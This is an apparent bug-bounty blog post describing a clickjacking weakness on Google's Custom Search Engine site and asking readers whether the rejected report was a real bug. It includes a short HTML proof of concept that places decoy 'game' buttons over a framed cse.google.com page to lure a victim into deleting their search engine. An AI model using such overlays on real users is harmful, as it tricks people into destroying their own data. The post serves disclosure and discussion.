I Found Clickjacking on Google CSE. Is This Important?

While i was testing i found that cse.google.com is vulnerable to clickjacking so i checked if the settings page is vulnerable or not and it was vulnerable so now this has a risk! The attacker could delete someone’s CSE.

Summary: Attacker can delete victim’s CSE.

Steps to reproduce:

  1. Go to https://cse.google.com/
  2. It can be embedded into any webpage.
  3. Attacker may manipulate HTML template so it can delete victim’s CSE.

I wrote an exploit code for clickjacking and here is the exploit code:

<div style="position: absolute; left: 100px; top: 10px;"><h3>Let's consider this is a game!</h3></div>
<div style="position: absolute; left: 100px; top: 40px;"><h3>To finish it, you have to press the keys in sequence.</h3></div>
<div style="position: absolute; left: 205px; top: 278px; color: red;"><button>1</button></div>
<div style="position: absolute; left: 300px; top: 178px; color: red;"><button>2</button></div>
<div style="position: absolute; left: 400px; top: 475px; color: red;"><button>3</button></div>
<iframe style="opacity: 1; border: 0; position: fixed; top: 0px; left: 0px;" src="https://cse.google.com/" width="100%" height="100%"></iframe>

By using Clickjacking technique, an attacker can make someone unconsciously delete their CSE.

About how attacker can make someone unconsciously delete their CSE, you can check my video POC here:

Enough about the explanation.

Okay, the problem has just begun. My findings above, in my opinion are valid bugs. Why? Because the attacker can delete someone’s data (CSE), isn’t this a bug? But the response I got was very surprising.

The part that makes me confused is, how is this not a bug? Because in my head it is clear that I can delete other people’s data.

What do you think? Is this a bug? Or is it just me who overestimates this as a bug?

This article already published in dev.to.